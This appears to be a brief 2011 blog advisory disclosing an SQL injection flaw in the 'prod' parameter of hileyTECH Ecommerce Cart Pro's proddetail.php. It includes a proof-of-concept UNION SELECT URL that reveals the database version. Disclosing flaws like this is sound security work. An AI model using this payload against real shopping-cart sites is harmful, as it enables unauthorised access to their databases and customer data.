Monday, November 14, 2011

hileyTECH Ecommerce Cart Pro Vulnerable to SQL Injection

Title      :    hileyTECH Ecommerce Cart Pro Vulnerable to SQL Injection
Vendor    :  http://www.hileytech.com
Links    :    http://www.hileytech.com/cartspec.html
Type     :    Web Application


Parameter 'proddetail.php' in hileyTECH Ecommerce Cart Pro is vulnetable to SQL Injection.
Proof of concept ::

http://localhost/proddetail.php?prod=[SQL]
http://localhost/proddetail.php?prod=-productname' union select concat(version())--+

~/p0pc0rn/~
Share:

Wednesday, November 2, 2011